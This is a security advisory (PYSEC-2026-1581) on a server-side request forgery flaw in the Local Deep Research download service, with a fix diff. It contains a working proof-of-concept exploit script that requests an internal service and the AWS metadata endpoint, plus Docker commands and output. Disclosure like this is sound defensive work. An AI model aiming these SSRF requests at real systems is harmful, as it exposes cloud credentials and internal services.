VDB
KO
MEDIUM 6.3

PYSEC-2026-1581

Local Deep Research is Vulnerable to Server-Side Request Forgery (SSRF) in Download Service

Details

## Summary

The download service (`download_service.py`) makes HTTP requests using raw `requests.get()` without utilizing the application's SSRF protection (`safe_requests.py`). This can allow attackers to access internal services and attempt to reach cloud provider metadata endpoints (AWS/GCP/Azure), as well as perform internal network reconnaissance, by submitting malicious URLs through the API, depending on the deployment and surrounding controls.

**CWE**: CWE-918 (Server-Side Request Forgery)

---

## Details

### Vulnerable Code Location

**File**: `src/local_deep_research/research_library/services/download_service.py`

The application has proper SSRF protection implemented in `security/safe_requests.py` and `security/ssrf_validator.py`, which blocks: - Loopback addresses (127.0.0.0/8) - Private IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) - AWS metadata endpoint (169.254.169.254) - Link-local addresses

However, `download_service.py` bypasses this protection by using raw `requests.get()` directly:

```python # Line 1038 - _download_generic method response = requests.get(url, headers=headers, timeout=30)

# Line 1075 response = requests.get(api_url, timeout=10)

# Line 1100 pdf_response = requests.get(pdf_url, headers=headers, timeout=30)

# Line 1144 response = requests.get(europe_url, headers=headers, timeout=30)

# Line 1187 api_response = requests.get(elink_url, params=params, timeout=10)

# Line 1207 summary_response = requests.get(esummary_url, ...)

# Line 1236 response = requests.get(europe_url, headers=headers, timeout=30)

# Line 1276 response = requests.get(url, headers=headers, timeout=10)

# Line 1298 response = requests.get(europe_url, headers=headers, timeout=30) ```

### Attack Vector

1. Attacker submits a malicious URL via `POST /api/resources/<research_id>` 2. URL is stored in database without SSRF validation (`resource_service.py:add_resource()`) 3. Download is triggered via `/library/api/download/<resource_id>` 4. `download_service.py` fetches the URL using raw `requests.get()`, bypassing SSRF protection

---

## PoC

### Prerequisites

- Docker and Docker Compose installed - Python 3.11+

### Step 1: Create the Mock Internal Service

**File: `internal_service.py`**

```python #!/usr/bin/env python3 """Mock internal service that simulates a sensitive internal endpoint."""

from http.server import HTTPServer, BaseHTTPRequestHandler import json

class InternalServiceHandler(BaseHTTPRequestHandler): def log_message(self, format, *args): print(f"[INTERNAL SERVICE] {args[0]}") def do_GET(self): print(f"\n{'='*60}") print(f"[!] SSRF DETECTED - Internal service accessed!") print(f"[!] Path: {self.path}") print(f"{'='*60}\n") self.send_response(200) self.send_header("Content-Type", "application/json") self.end_headers() secret_data = { "status": "SSRF_SUCCESSFUL", "message": "You have accessed internal service via SSRF!", "internal_secrets": { "database_password": "super_secret_db_pass_123", "api_key": "sk-internal-api-key-xxxxx", "admin_token": "admin_bearer_token_yyyyy" } } self.wfile.write(json.dumps(secret_data, indent=2).encode())

if __name__ == "__main__": print("[*] Starting mock internal service on port 8080") server = HTTPServer(("0.0.0.0", 8080), InternalServiceHandler) server.serve_forever() ```

### Step 2: Create the Exploit Script

**File: `exploit.py`**

```python #!/usr/bin/env python3 """SSRF Vulnerability Active PoC"""

import sys import requests

sys.path.insert(0, '/app/src')

def main(): print("=" * 70) print("SSRF Vulnerability PoC - Active Exploitation") print("=" * 70) internal_url = "http://ssrf-internal-service:8080/secret-data" aws_metadata_url = "http://169.254.169.254/latest/meta-data/" headers = {"User-Agent": "Mozilla/5.0"} # EXPLOIT 1: Access internal service print("\n[EXPLOIT 1] Accessing internal service via SSRF") print(f" Target: {internal_url}") try: # Same pattern as download_service.py line 1038 response = requests.get(internal_url, headers=headers, timeout=30) print(f" [!] SSRF SUCCESSFUL! Status: {response.status_code}") print(f" [!] Retrieved secrets:") for line in response.text.split('\n')[:15]: print(f" {line}") except Exception as e: print(f" [-] Failed: {e}") return 1 # EXPLOIT 2: AWS metadata bypass print("\n[EXPLOIT 2] AWS Metadata endpoint bypass") from local_deep_research.security.ssrf_validator import validate_url print(f" SSRF validator: {'ALLOWED' if validate_url(aws_metadata_url) else 'BLOCKED'}") print(f" But download_service.py BYPASSES the validator!") try: requests.get(aws_metadata_url, timeout=5) except requests.exceptions.ConnectionError: print(f" Request sent without SSRF validation!") print("\n" + "=" * 70) print("SSRF VULNERABILITY CONFIRMED") print("=" * 70) return 0

if __name__ == "__main__": sys.exit(main()) ```

### Step 3: Run the PoC

```bash # Build and run with Docker docker network create ssrf-poc-net docker run -d --name ssrf-internal-service --network ssrf-poc-net python:3.11-slim sh -c "pip install -q && python internal_service.py" docker run --rm --network ssrf-poc-net -v ./src:/app/src ssrf-vulnerable-app python exploit.py ```

### Expected Output

``` ====================================================================== SSRF Vulnerability PoC - Active Exploitation ======================================================================

[EXPLOIT 1] Accessing internal service via SSRF Target: http://ssrf-internal-service:8080/secret-data [!] SSRF SUCCESSFUL! Status: 200 [!] Retrieved secrets: { "status": "SSRF_SUCCESSFUL", "message": "You have accessed internal service via SSRF!", "internal_secrets": { "database_password": "super_secret_db_pass_123", "api_key": "sk-internal-api-key-xxxxx", "admin_token": "admin_bearer_token_yyyyy" } }

[EXPLOIT 2] AWS Metadata endpoint bypass SSRF validator: BLOCKED But download_service.py BYPASSES the validator! Request sent without SSRF validation!

====================================================================== SSRF VULNERABILITY CONFIRMED ====================================================================== ```

---

## Impact

### Who is affected?

All users running local-deep-research in: - **Cloud environments** (AWS, GCP, Azure) - attackers can steal cloud credentials via metadata endpoints - **Corporate networks** - attackers can access internal services and databases - **Any deployment** - attackers can scan internal networks

### What can an attacker do?

| Attack | Impact | |--------|--------| | Access cloud metadata | Potentially access IAM credentials, API keys, or instance identity in certain cloud configurations | | Internal service access | Read sensitive data from databases, Redis, admin panels | | Network reconnaissance | Map internal network topology and services | | Bypass firewalls | Access services not exposed to the internet |

---

## Recommended Fix

Replace all `requests.get()` calls in `download_service.py` with `safe_get()` from `security/safe_requests.py`:

```diff # download_service.py

+ from ...security.safe_requests import safe_get

def _download_generic(self, url, ...): - response = requests.get(url, headers=headers, timeout=30) + response = safe_get(url, headers=headers, timeout=30) ```

The `safe_get()` function already validates URLs against SSRF attacks before making requests.

### Files to update: - `src/local_deep_research/research_library/services/download_service.py` (9 occurrences) - `src/local_deep_research/research_library/downloaders/base.py` (uses `requests.Session`)

---

## References

- [CWE-918: Server-Side Request Forgery (SSRF)](https://cwe.mitre.org/data/definitions/918.html) - [OWASP SSRF Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html) - [AWS SSRF Attacks and IMDSv2](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html) - [PortSwigger: SSRF](https://portswigger.net/web-security/ssrf)

---

Thank you for your work on this project! I'm happy to provide any additional information or help with testing the fix.

Are you affected?

Enter the version of the package you're using.

Affected packages

PyPI / local-deep-research
Introduced in: 1.3.0 Fixed in: 1.3.9
Fix pip install --upgrade 'local-deep-research>=1.3.9'

References